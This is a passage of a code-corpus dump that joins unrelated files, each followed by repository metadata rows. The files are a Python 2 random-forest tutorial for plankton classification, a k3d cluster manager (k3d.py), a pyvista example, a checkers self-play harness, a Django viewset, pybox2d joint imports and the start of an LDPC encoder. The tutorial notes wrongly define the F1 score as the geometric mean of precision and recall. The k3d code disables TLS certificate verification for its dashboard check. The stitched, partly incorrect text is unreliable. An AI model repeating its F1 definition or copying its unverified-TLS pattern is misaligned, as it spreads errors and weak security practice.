have less than the minimum number of samples for a split (in sklearn default
for min_samples_split is two data points). The final majority class purity of
the terminal nodes of the decision tree are used for making predictions on what
class a new data point will belong. Then, the aggregate vote across the forest
determines the class prediction for new samples.
With our training data consisting of the feature vector X and the class label
vector y, we will now calculate some class metrics for the performance of our
model, by class and overall. First, we train the random forest on all the
available data and let it perform the 5-fold cross validation. Then we perform
the cross validation using the KFold method, which splits the data into train
and test sets, and a classification report. The classification report provides
a useful list of performance metrics for your classifier vs. the internal
metrics of the random forest module.
"""
# From Tutorial [19]
# Train a random forest on the full feature matrix X / labels y and report
# the mean 5-fold cross-validated accuracy.
# NOTE: this script uses Python 2 print statements.
print "Training"
# n_estimators is the number of decision trees
# max_features also known as m_try is set to the default value of the square
# root of the number of features
clf = RF(n_estimators=100, n_jobs=3);
scores = cross_validation.cross_val_score(clf, X, y, cv=5, n_jobs=1);
print "Accuracy of all classes"
print np.mean(scores)
"""
Tutorial Results:
Training
Accuracy of all classes
0.446073202468
# 2/?/2015
I got *very* close:
Accuracy of all classes
0.466980629201
# 2/21/2015 6:50pm Also very close
Training
Accuracy of all classes
0.466064989056
# 2/22/2015
Training
Accuracy of all classes
0.465496298508
"""
# From Tutorial [14]:
# TODO: Understand completely:
# sklearn.cross_validation import StratifiedKFold as KFold, including results
# Stratified 5-fold cross-validation: collect out-of-fold class predictions
# for every sample, then print per-class precision/recall/F1.
kf = KFold(y, n_folds=5)
y_pred = y * 0  # placeholder with the same shape/dtype as y
for train, test in kf:
    X_train, X_test, y_train, y_test=X[train, :], X[test, :], y[train], y[test]
    clf = RF(n_estimators=100, n_jobs=3)
    clf.fit(X_train, y_train)
    y_pred[test] = clf.predict(X_test)
print classification_report(y, y_pred, target_names=namesClasses)
"""
The current model, while somewhat accurate overall, doesn't do well for all
classes, including the shrimp caridean, stomatopod, or hydromedusae tentacles
classes. For others it does quite well, getting many of the correct
classifications for trichodesmium_puff and copepod_oithona_eggs classes. The
metrics shown above for measuring model performance include precision, recall,
and f1-score.
The precision metric gives probability that a chosen class is correct,
(true positives / (true positive + false positives)),
while recall measures the ability of the model to correctly classify examples
of a given class,
(true positives / (false negatives + true positives)).
The F1 score is the geometric average of the precision and recall (the sqrt of
their product).
The competition scoring uses a multiclass log-loss metric to compute your
overall score. In the next steps, we define the multiclass log-loss function
and compute your estimated score on the training dataset.
"""
# From tutorial [16]:
def multiclass_log_loss(y_true, y_pred, eps=1e-15):
    """Multi class version of Logarithmic Loss metric.
    https://www.kaggle.com/wiki/MultiClassLogLoss
    Parameters
    ----------
    y_true : array-like, shape = [n_samples]
        True class labels, integers in [0, n_classes).
    y_pred : array-like, shape = [n_samples, n_classes]
        Predicted class probabilities, one row per sample.
    eps : float, optional
        Clipping bound that keeps probabilities away from 0 and 1 so that
        np.log never produces -inf.
    Returns
    -------
    loss : float
        Mean negative log-likelihood of the true classes.
    """
    # Coerce inputs so plain Python lists and integer arrays also work; the
    # float dtype is required for the in-place row normalization below.
    y_true = np.asarray(y_true)
    y_pred = np.asarray(y_pred, dtype=float)
    predictions = np.clip(y_pred, eps, 1 - eps)
    # normalize row sums to 1 (clipping can perturb the sum slightly)
    predictions /= predictions.sum(axis=1)[:, np.newaxis]
    # one-hot encode the true labels
    actual = np.zeros(y_pred.shape)
    n_samples = actual.shape[0]
    actual[np.arange(n_samples), y_true.astype(int)] = 1
    # only the predicted probability of the true class contributes to the sum
    vectsum = np.sum(actual * np.log(predictions))
    loss = -1.0 / n_samples * vectsum
    return loss
# From tutorial [17]:
# Get the probability predictions for computing the log-loss function
kf = KFold(y, n_folds=5)
# prediction probabilities number of samples, by number of classes
y_pred = np.zeros((len(y), len(set(y))))
for train, test in kf:
    X_train, X_test, y_train, y_test = X[train,:], X[test,:], y[train], y[test]
    clf = RF(n_estimators=100, n_jobs=3)
    clf.fit(X_train, y_train)
    y_pred[test] = clf.predict_proba(X_test)
# From tutorial [18]:
# NOTE: the return value is not stored or printed here; in an interactive
# notebook the expression's value would be displayed automatically.
multiclass_log_loss(y, y_pred)
"""
Tutorial Results: 3.7390475458333374
My results - very close:
2/?/2015 3.7285067867109327
2/22/2015 3.7570415769375152
"""
""""
The multiclass log loss function is a classification error metric that heavily
penalizes you for being both confident (either predicting very high or very low
class probability) and wrong. Throughout the competition you will want to check
that your model improvements are driving this loss metric lower.
"""
"""
Where to Go From Here
Now that you've made a simple metric, created a model, and examined the model's
performance on the training data, the next step is to make improvements to your
model to make it more competitive. The random forest model we created does not
perform evenly across all classes and in some cases fails completely. By
creating new features and looking at some of your distributions for the problem
classes directly, you can identify features that specifically help separate
those classes from the others. You can add new metrics by considering other
image properties, stratified sampling, transformations, or other models for the
classification.
"""
| 36.443418 | 80 | 0.721229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10,181 | 0.645184 |
339ad92405feefc3b07ccc7b60e49d33ef95a496 | 14,810 | py | Python | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 188 | 2020-04-23T07:58:04.000Z | 2022-03-30T19:39:29.000Z | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 29 | 2020-06-08T16:09:08.000Z | 2022-03-21T21:52:30.000Z | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 14 | 2020-06-24T13:56:58.000Z | 2022-03-16T12:13:54.000Z | # k3d.py
#
# Copyright 2020 Alvaro Saurin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import ssl
import subprocess
import time
import urllib.error
import urllib.request
import datetime
from dateutil.parser import parse
from typing import Dict, Iterator, List
from typing import Optional, Tuple, Callable
from gi.repository import GObject
from .config import APP_ENV_PREFIX
from .config import ApplicationSettings
from .config import (DEFAULT_EXTRA_PATH,
DEFAULT_API_SERVER_PORT_RANGE,
DEFAULT_K3D_WAIT_TIME)
from .docker import DockerController
from .helm import HelmChart, cleanup_for_owner
from .utils import (call_in_main_thread,
find_unused_port_in_range,
parse_or_get_address,
find_executable,
run_command_stdout)
from .utils_ui import show_notification
# the header/footer length in the "k3d list" output
K3D_LIST_HEADER_LEN = 3
K3D_LIST_FOOTER_LEN = 1
# directory in the K3s container where we should put manifests for being automatically loaded
K3D_DOCKER_MANIFESTS_DIR = "/var/lib/rancher/k3s/server/manifests/"
###############################################################################
# locate the k3d binary once at import time (DEFAULT_EXTRA_PATH adds extra
# search directories beyond the regular PATH)
k3d_exe = find_executable("k3d", extra_paths=DEFAULT_EXTRA_PATH)
logging.debug(f"k3d found at {k3d_exe}")
def run_k3d_command(*args, **kwargs) -> Iterator[str]:
    """
    Run a k3d command, yielding its stdout line by line.

    *args* are passed verbatim as command-line arguments to the k3d
    executable; **kwargs** are forwarded to the underlying runner
    (e.g. an alternative process environment).
    """
    logging.debug(f"[K3D] Running k3d command: {args}")
    yield from run_command_stdout(k3d_exe, *args, **kwargs)
###############################################################################
# errors
###############################################################################
# All k3d-related exceptions derive from K3dError, so callers can catch the
# whole family with a single `except K3dError`.
class K3dError(Exception):
    """Base class for other k3d exceptions"""
    pass
class EmptyClusterNameError(K3dError):
    """No cluster name"""
    pass
class InvalidNumWorkersError(K3dError):
    """Invalid num workers"""
    pass
class ClusterCreationError(K3dError):
    """Cluster creation error"""
    pass
class ClusterDestructionError(K3dError):
    """Cluster destruction error"""
    pass
class ClusterNotFoundError(K3dError):
    """Cluster not found error"""
    pass
class NoKubeconfigObtainedError(K3dError):
    """No kubeconfig obtained error"""
    pass
class NoServerError(K3dError):
    """No Docker server error"""
    pass
###############################################################################
# k3d clusters
###############################################################################
class K3dCluster(GObject.GObject):
    """
    A k3d-managed cluster.

    Instances describe (and drive) one cluster: create()/destroy() shell out
    to the `k3d` binary, while the properties below query Docker for runtime
    details (server container, IP, dashboard URL).
    """
    # Class-level defaults; __init__ overrides them from **kwargs.
    # NOTE(review): registry_name/registry_port/api_server/image/server_args
    # are annotated `str` but default to None — effectively Optional[str].
    name: str = ""
    status: str = "running"
    num_workers: int = 0
    use_registry: bool = False
    registry_name: str = None
    registry_port: str = None
    registry_volume: str = None
    cache_hub: bool = False
    api_server: str = None
    image: str = None
    volumes: Dict[str, str] = {}
    charts: List[HelmChart] = []
    server_args: str = None
    __gsignals__ = {
        # a signal emitted when the cluster has been created
        "created": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,)),
        # a signal emitted when the cluster has been destroyed
        "destroyed": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,))
    }
def __init__(self, settings: ApplicationSettings, docker: DockerController, **kwargs):
super().__init__()
self._docker = docker
self._settings = settings
self._kubeconfig = None
self._docker_created: Optional[datetime.datetime] = None
self._docker_server_ip = None
self._destroyed = False
self._status = kwargs.pop("status", "running")
self.__dict__.update(kwargs)
# TODO: check the name is valid
if len(self.name) == 0:
raise InvalidNumWorkersError
if self.num_workers < 0:
raise InvalidNumWorkersError
    def __str__(self) -> str:
        # a cluster renders as its name
        return f"{self.name}"
    def __eq__(self, other) -> bool:
        """Compare by cluster name; plain strings are accepted as well."""
        if other is None:
            return False
        if isinstance(other, K3dCluster):
            return self.name == other.name
        if isinstance(other, str):
            return self.name == other
        logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
        return NotImplemented
    def __ne__(self, other) -> bool:
        """Inverse of __eq__, kept explicit for symmetry with the types above."""
        if other is None:
            return True
        if isinstance(other, K3dCluster):
            return self.name != other.name
        if isinstance(other, str):
            return self.name != other
        logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
        return NotImplemented
    def quit(self):
        # shutdown hook; nothing to release for a plain cluster object
        pass
    def create(self, wait=True) -> None:
        """
        Create the cluster by invoking `k3d create`.

        When `wait` is True the command blocks until the cluster is ready
        (up to DEFAULT_K3D_WAIT_TIME). On any failure the partially-created
        cluster is cleaned up and the exception is re-raised. Emits the
        "created" signal on success.
        """
        args = []
        kwargs = {}
        if not self.name:
            raise EmptyClusterNameError()
        args += [f"--name={self.name}"]
        # registry-related flags only make sense when the registry is enabled
        if self.use_registry:
            args += ["--enable-registry"]
            if self.cache_hub:
                args += ["--enable-registry-cache"]
            if self.registry_volume:
                args += [f"--registry-volume={self.registry_volume}"]
            if self.registry_name:
                args += [f"--registry-name={self.registry_name}"]
            if self.registry_port:
                args += [f"--registry-port={self.registry_port}"]
        if wait:
            args += [f"--wait={DEFAULT_K3D_WAIT_TIME}"]
        if self.num_workers > 0:
            args += [f"--workers={self.num_workers}"]
        if self.image:
            args += [f"--image={self.image}"]
        # create some k3s server arguments
        # by default, we add a custom DNS domain with the same name as the cluster
        args += [f"--server-arg=--cluster-domain={self.name}.local"]
        if self.server_args:
            args += [f"--server-arg={arg}" for arg in self.server_args if len(arg) > 0]
        # append any extra volumes
        for vol_k, vol_v in self.volumes.items():
            args += [f"--volume={vol_k}:{vol_v}"]
        # append any extra Charts as volumes too (k3s auto-applies manifests
        # dropped in K3D_DOCKER_MANIFESTS_DIR)
        for chart in self.charts:
            src = chart.generate(self)
            dst = f"{K3D_DOCKER_MANIFESTS_DIR}/{chart.name}.yaml"
            args += [f"--volume={src}:{dst}"]
        # use the given API port or find an unused one
        self.api_server = parse_or_get_address(self.api_server, *DEFAULT_API_SERVER_PORT_RANGE)
        logging.info(f"[K3D] Using API address {self.api_server}")
        args += [f"--api-port={self.api_server}"]
        # check if we must use an env variable for the DOCKER_HOST
        docker_host = self._docker.docker_host
        default_docker_host = self._docker.default_docker_host
        if docker_host != self._docker.default_docker_host:
            logging.debug(f"[K3D] Overriding DOCKER_HOST={docker_host} (!= {default_docker_host})")
            new_env = os.environ.copy()
            new_env["DOCKER_HOST"] = docker_host
            kwargs["env"] = new_env
        try:
            logging.info(f"[K3D] Creating cluster (with {args})")
            # consume the command's stdout until it finishes
            while True:
                try:
                    line = next(run_k3d_command("create", *args, **kwargs))
                    logging.debug(f"[K3D] {line}")
                    # detect errors in the output (k3d may still exit 0)
                    if "level=fatal" in line:
                        raise ClusterCreationError(line.strip())
                except StopIteration:
                    break
        except Exception as e:
            logging.error(f"Could not create cluster: {e}. Cleaning up...")
            self._cleanup()
            self._destroyed = True
            raise e
        logging.info("[K3D] The cluster has been created")
        self._status = "running"
        # emit from the main (GTK) thread, as signal handlers may touch the UI
        call_in_main_thread(lambda: self.emit("created", self.name))
    def destroy(self) -> None:
        """
        Destroy this cluster with `k3d delete`.

        The registry volume is preserved (--keep-registry-volume) so cached
        images survive across cluster re-creations. Emits "destroyed" when done.
        """
        logging.info("[K3D] Destroying cluster")
        if not self.name:
            raise EmptyClusterNameError()
        if self._destroyed:
            raise ClusterDestructionError("Trying to destroy an already destroyed cluster")
        args = []
        args += [f"--name={self.name}"]
        args += ["--keep-registry-volume"]
        # drain the command output until the deletion finishes
        while True:
            try:
                line = next(run_k3d_command("delete", *args))
                logging.debug(f"[K3D] {line}")
            except StopIteration:
                break
        self._cleanup()
        self._destroyed = True
        call_in_main_thread(lambda: self.emit("destroyed", self.name))
    def _cleanup(self) -> None:
        """
        Cleanup any remaining things (e.g. generated Helm chart files)
        after destroying a cluster.
        """
        logging.debug(f"[K3D] Cleaning up for {self.name}")
        cleanup_for_owner(self.name)
    @property
    def kubeconfig(self) -> Optional[str]:
        """
        Get the kubeconfig file path for this cluster, or None if it
        could not be obtained (or the cluster has been destroyed).
        """
        if self._destroyed:
            return None
        # cache the kubeconfig: once obtained, it will not change
        if not self._kubeconfig:
            # retry for up to ~20 seconds: right after creation k3d may not
            # have the kubeconfig ready yet
            for _ in range(0, 20):
                try:
                    line = next(run_k3d_command("get-kubeconfig", f"--name={self.name}"))
                except StopIteration:
                    break
                except subprocess.CalledProcessError:
                    logging.debug(f"[K3D] ... KUBECONFIG for {self.name} not ready yet...")
                    time.sleep(1)
                else:
                    # try-else: runs only when no exception was raised
                    logging.debug(f"[K3D] ... obtained KUBECONFIG for {self.name} at {line}")
                    self._kubeconfig = line
                    break
        return self._kubeconfig
    @property
    def running(self) -> bool:
        # True unless the cluster has been explicitly stopped
        return self._status == "running"
    def start(self) -> None:
        """Start a stopped cluster via `k3d start` (no-op when already running)."""
        # NOTE(review): self._status is not updated here — presumably it is
        # refreshed elsewhere (e.g. when re-listing clusters); confirm.
        if not self.running:
            args = []
            args += [f"--name={self.name}"]
            logging.debug(f"[K3D] Starting {self.name}...")
            while True:
                try:
                    line = next(run_k3d_command("start", *args))
                    logging.debug(f"[K3D] {line}")
                except StopIteration:
                    break
    def stop(self) -> None:
        """Stop a running cluster via `k3d stop` (no-op when already stopped)."""
        # NOTE(review): same as start() — self._status is not updated here.
        if self.running:
            args = []
            args += [f"--name={self.name}"]
            logging.debug(f"[K3D] Stopping {self.name}...")
            while True:
                try:
                    line = next(run_k3d_command("stop", *args))
                    logging.debug(f"[K3D] {line}")
                except StopIteration:
                    break
    @property
    def docker_created(self) -> Optional[datetime.datetime]:
        """Creation time of the server container (cached), or None."""
        if self._destroyed:
            return None
        if self._docker_created is None:
            c = self._docker.get_container_by_name(self.docker_server_name)
            if c:
                t = self._docker.get_container_created(c)
                if t:
                    try:
                        # dateutil.parser.parse: Docker reports the time as a string
                        self._docker_created = parse(t)
                    except Exception as e:
                        logging.error(f"[K3D] could not parse time string {t}: {e}")
        return self._docker_created
    @property
    def docker_server_name(self) -> Optional[str]:
        """Name of the Docker container running the k3s server."""
        if self._destroyed:
            return None
        return f"k3d-{self.name}-server"
    @property
    def docker_network_name(self) -> Optional[str]:
        """Name of the Docker network created by k3d for this cluster."""
        if self._destroyed:
            return None
        return f"k3d-{self.name}"
    @property
    def docker_server_ip(self) -> Optional[str]:
        """IP of the server container on the cluster network (cached)."""
        if self._destroyed:
            return None
        if not self._docker_server_ip:
            c = self._docker.get_container_by_name(self.docker_server_name)
            if c:
                ip = self._docker.get_container_ip(c, self.docker_network_name)
                if ip is None:
                    raise NoServerError(
                        f"could not obtain server IP for {self.docker_server_name} in network {self.docker_network_name}")
                self._docker_server_ip = ip
        return self._docker_server_ip
    @property
    def dashboard_url(self) -> Optional[str]:
        """HTTPS URL of the cluster dashboard, or None if no server IP yet."""
        if self._destroyed:
            return None
        ip = self.docker_server_ip
        if ip:
            return f"https://{self.docker_server_ip}/"
    def check_dashboard(self, *args) -> bool:
        """
        Check that the Dashboard is ready.

        NOTE(review): on success this returns the HTTP status code (an int),
        not a strict bool — callers appear to rely on truthiness only; confirm.
        """
        try:
            # certificate verification is disabled; presumably the dashboard
            # serves a self-signed certificate — TODO confirm
            context = ssl._create_unverified_context()
            return urllib.request.urlopen(self.dashboard_url, context=context).getcode()
        except urllib.error.URLError as e:
            logging.info(f"Error when checking {self.dashboard_url}: {e}")
            return False
    def open_dashboard(self, *args) -> None:
        """Open the cluster dashboard URL in the default web browser."""
        import webbrowser
        u = self.dashboard_url
        if u is not None:
            logging.debug(f"[K3D] Opening '{u}' in default web browser")
            webbrowser.open(u)
        else:
            logging.warning(f"[K3D] No URL to open")
    @property
    def script_environment(self) -> Dict[str, str]:
        """
        Return a dictionary with env variables for running scripts for this
        cluster (cluster name, registry details, master IP, kubeconfig path).
        """
        # Note: make sure we do not return any non-string value or subprocess.run will throw an exception.
        env = {
            f"{APP_ENV_PREFIX}_CLUSTER_NAME": str(self.name),
        }
        # runtime details are only meaningful while the cluster still exists
        if not self._destroyed:
            env.update({
                f"{APP_ENV_PREFIX}_REGISTRY_ENABLED": "1" if self.use_registry else "",
                f"{APP_ENV_PREFIX}_REGISTRY_NAME": str(self.registry_name) if self.registry_name else "",
                f"{APP_ENV_PREFIX}_REGISTRY_PORT": str(self.registry_port) if self.registry_port else "",
                f"{APP_ENV_PREFIX}_MASTER_IP": str(self.docker_server_ip) if self.docker_server_ip is not None else "",
                f"{APP_ENV_PREFIX}_KUBECONFIG": self.kubeconfig if self.kubeconfig is not None else "",
            })
        return env
GObject.type_register(K3dCluster)
| 32.336245 | 122 | 0.576637 | 12,235 | 0.826131 | 208 | 0.014045 | 3,664 | 0.2474 | 0 | 0 | 4,648 | 0.313842 |
339c2850fe3848ca48de45f881ca59f6d9fd81f3 | 153 | py | Python | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 4 | 2020-08-07T08:19:19.000Z | 2020-12-04T09:51:11.000Z | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 19 | 2020-08-06T00:24:30.000Z | 2022-03-30T19:22:24.000Z | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 1 | 2021-03-09T07:50:40.000Z | 2021-03-09T07:50:40.000Z | # Create a disc with 50 points in the circumferential direction.
#
import pyvista
mesh = pyvista.Disc(c_res=50)
mesh.plot(show_edges=True, line_width=5)
| 25.5 | 64 | 0.784314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.424837 |
339d94c7e05fc5f397dd56538bd484357362ee32 | 7,364 | py | Python | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | import os
from utility import write_to_output, print_board, color_is_black, board_to_list, print_results
from board import Board
import time
from algorithm import minimax, minimax_alpha_beta, minimax_alpha_beta_final, minimax_alpha_beta_rand
from math import sqrt, floor
start = time.time()
# parse input file
with open("input.txt", "r") as input_file:
game_mode = input_file.readline().rstrip() # 1st line: game mode
color = input_file.readline().rstrip() # 2nd line: player color
time_left = float(input_file.readline().rstrip()) # 3rd line: remaining time
board_list = []
for i in range(8): # next 8 lines: 2-d list representing the board
board_list.append(list(input_file.readline().rstrip()))
# create initial board object
is_black = color_is_black(color)
start = time.time()
board = Board(board_list, is_black)
end = time.time()
print("time to make board object =", end - start)
# write mean runtimes to calibrate.txt
# Run a batch of self-play games (black: minimax_alpha_beta_final, white:
# minimax_alpha_beta_rand) and write the aggregated results to test.txt.
with open('test.txt', 'w') as output:
    # print description of game
    print("d_b = 4; d_w = 4; simple heuristic for both b/w", file = output)
    # play a batch of games (10 here) and tally the outcomes
    black_wins = 0
    white_wins = 0
    timeouts = 0
    for i in range(10):
        start = time.time()
        # re-parse the input file so every game starts from the same position
        with open("input.txt", "r") as input_file:
            game_mode = input_file.readline().rstrip() # 1st line: game mode
            color = input_file.readline().rstrip() # 2nd line: player color
            time_left = float(input_file.readline().rstrip()) # 3rd line: remaining time
            board_list = []
            for i in range(8): # next 8 lines: 2-d list representing the board
                board_list.append(list(input_file.readline().rstrip()))
        # create initial board object
        is_black = color_is_black(color)
        start = time.time()
        board = Board(board_list, is_black)
        end = time.time()
        print("time to make board object =", end - start)
        max_iterations = 100
        iteration_count = 1
        total_time_black = 0
        total_time_white = 0
        # loop until someone wins or maximum iterations exceeded
        while True:
            start = time.time()
            minimax_alpha_beta_rand.count = 0
            minimax_alpha_beta_final.count = 0
            move_count = floor(iteration_count/2)
            if board.active_player: # black's turn
                # both branches currently use identical parameters (depth 4/4)
                if move_count%2 == 0:
                    value, result, new_board = minimax_alpha_beta_final(board, board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
                else:
                    value, result, new_board = minimax_alpha_beta_final(board, board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
            else: # white's turn
                # both branches currently use identical parameters (depth 2/2)
                if move_count%2 == 0:
                    value, result, new_board = minimax_alpha_beta_rand(board, board, board.active_player, 2, 2, float("-inf"), float("inf"), True, (), board)
                else:
                    value, result, new_board = minimax_alpha_beta_rand(board, board, board.active_player, 2, 2, float("-inf"), float("inf"), True, (), board)
            end = time.time()
            runtime = end - start
            # if we run into a blocked board with lots of pieces left (i.e. it wasn't caught in game_over method):
            if result == None:
                print("total time black =", total_time_black)
                print("total time white =", total_time_white)
                if board.num_pieces_black == 0:
                    white_wins += 1
                elif board.num_pieces_white == 0:
                    black_wins += 1
                else:
                    timeouts += 1
                break
            # set up new board
            board = new_board
            # create new board_list (for printing later)
            board_list = board_to_list(board)
            # print result to game_output.txt
            print_results(board, result, board_list, iteration_count, runtime)
            # accumulate total runtime
            if board.active_player: # black's total time
                total_time_black += runtime
            else: # white's total time
                total_time_white += runtime
            # switch player
            board.active_player = not board.active_player
            # break loop if someone won or exceeded max iterations
            if board.game_over() or iteration_count >= max_iterations:
                print("total time black =", total_time_black)
                print("total time white =", total_time_white)
                if board.num_pieces_black == 0:
                    white_wins += 1
                elif board.num_pieces_white == 0:
                    black_wins += 1
                else:
                    timeouts += 1
                break
            iteration_count += 1
    # print final results to file
    print("black wins =", black_wins, file = output)
    print("white wins =", white_wins, file = output)
    print("timeouts =", timeouts, file = output)
339e1f9b6047c43589a665151b5f5b6446ffe99f | 1,407 | py | Python | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.db.models import Q
import django_filters
from core.models import ApplicationVersionLicense as ImageVersionLicense
from api.v2.serializers.details import ImageVersionLicenseSerializer
from api.v2.views.base import AuthModelViewSet
class VersionFilter(django_filters.FilterSet):
    """
    Filter ImageVersionLicense querysets by image-version UUID and by the
    username of the version's (or its application's) creator.
    """
    version_id = django_filters.CharFilter(method='filter_by_uuid')
    created_by = django_filters.CharFilter(method='filter_owner')
    def filter_owner(self, queryset, name, value):
        # match either the version's creator or the owning application's creator
        return queryset.filter(
            Q(image_version__created_by__username=value) |
            Q(image_version__application__created_by__username=value)
        )
    def filter_by_uuid(self, queryset, name, value):
        # NOTE: Remove this *HACK* once django_filters supports UUID as PK fields
        return queryset.filter(image_version__id=value)
    class Meta:
        model = ImageVersionLicense
        fields = ['version_id', 'created_by']
class ImageVersionLicenseViewSet(AuthModelViewSet):
    """
    API endpoint that allows image version licenses to be viewed.
    """
    # empty default queryset; get_queryset() supplies the real one per request
    queryset = ImageVersionLicense.objects.none()
    serializer_class = ImageVersionLicenseSerializer
    filter_class = VersionFilter
    def get_queryset(self):
        """
        Restrict results to licenses of versions created by the requesting user.
        """
        return ImageVersionLicense.objects.filter(
            image_version__created_by=self.request.user)
| 33.5 | 81 | 0.734186 | 1,158 | 0.823028 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.179815 |
339ebff6a47b6fc0d76354525972cdafcdf197e6 | 216 | py | Python | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | 1 | 2019-02-27T12:59:49.000Z | 2019-02-27T12:59:49.000Z | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | 4 | 2019-03-07T09:31:51.000Z | 2019-03-12T15:19:40.000Z | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from os import getenv
from datetime import datetime
def vprint(*args, **kwargs):
    """Print *args* prefixed with a timestamp, but only when the VERBOSE
    environment variable is set to a non-empty value; otherwise do nothing."""
    if getenv('VERBOSE'):
        print(datetime.now(), ' ', end='')
        print(*args, **kwargs)
| 19.636364 | 38 | 0.643519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.064815 |
339ef85148fe55aaa28cf0f86e5f3b80b5277dee | 1,964 | py | Python | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# C++ version Copyright (c) 2006-2011 Erin Catto http://www.box2d.org
# Python port by Ken Lauer / http://pybox2d.googlecode.com
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from __future__ import absolute_import
__all__ = ('Joint', 'DistanceJoint', 'RevoluteJoint', 'FrictionJoint',
'PrismaticJoint', 'WeldJoint', 'RopeJoint', 'WheelJoint',
'MouseJoint', 'PulleyJoint', 'GearJoint',
'INACTIVE_LIMIT', 'AT_LOWER_LIMIT', 'AT_UPPER_LIMIT', 'EQUAL_LIMITS',
'ALLOWED_STRETCH')
__version__ = "$Revision: 352 $"
__date__ = "$Date: 2011-07-14 20:14:23 -0400 (Thu, 14 Jul 2011) $"
# $Source$
from .joint import (INACTIVE_LIMIT, AT_LOWER_LIMIT, AT_UPPER_LIMIT, EQUAL_LIMITS, ALLOWED_STRETCH)
from .joint import Joint
from .distance import DistanceJoint
from .revolute import RevoluteJoint
from .friction import FrictionJoint
from .prismatic import PrismaticJoint
from .weld import WeldJoint
from .rope import RopeJoint
from .wheel import WheelJoint
from .mouse import MouseJoint
from .pulley import PulleyJoint
from .gear import GearJoint
| 42.695652 | 99 | 0.735234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,312 | 0.668024 |
339fda81b9c470880acae060465b85a254b0eac1 | 3,939 | py | Python | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 22 | 2020-08-27T00:24:30.000Z | 2021-12-31T07:11:21.000Z | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 1 | 2021-06-30T16:50:38.000Z | 2021-06-30T16:50:38.000Z | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 6 | 2020-11-04T11:11:00.000Z | 2021-06-30T16:48:39.000Z | import subprocess
import os
import argparse
import tempfile
def get_parser():
# argument parser
parser = argparse.ArgumentParser(description='Input')
parser.add_argument('--pchk-file', '-p',
action='store',
dest='pchk_file',
type=str,
help='Parity check file.\
